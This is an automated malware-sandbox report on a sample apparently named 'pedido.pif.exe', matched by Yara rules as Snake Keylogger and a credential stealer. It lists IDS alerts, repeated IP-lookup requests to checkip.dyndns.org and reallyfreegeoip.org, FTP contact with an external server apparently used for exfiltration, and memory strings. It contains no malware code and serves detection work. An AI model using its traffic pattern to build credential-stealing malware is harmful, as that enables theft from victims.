Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:55433 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49725 -> 188.114.96.3:443

Source: unknown

FTP traffic detected: 50.31.176.103:21 -> 192.168.2.8:55434 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 500 allowed.220-Local time is now 05:37. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49721 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BED000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: pedido.pif.exe, 00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: pedido.pif.exe, 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, RePUtenbQjvc.exe, 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: pedido.pif.exe, 00000000.00000002.1494745105.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 00000009.00000002.1562113138.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pedido.pif.exe, RePUtenbQjvc.exe.0.dr	String found in binary or memory: http://tempuri.org/GameInfoDataSet.xsdGFinalProjectTV.Properties.Resources
Source: pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: pedido.pif.exe, 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, RePUtenbQjvc.exe, 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77
Source: pedido.pif.exe, 00000007.00000002.3875604256.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, pedido.pif.exe, 00000007.00000002.3875604256.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002C0D000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002BB5000.00000004.00000800.00020000.00000000.sdmp, RePUtenbQjvc.exe, 0000000C.00000002.3874673292.0000000002B65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55436
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55433
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 7.2.pedido.pif.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.pedido.pif.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.pedido.pif.exe.4c834d0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.pedido.pif.exe.4c834d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
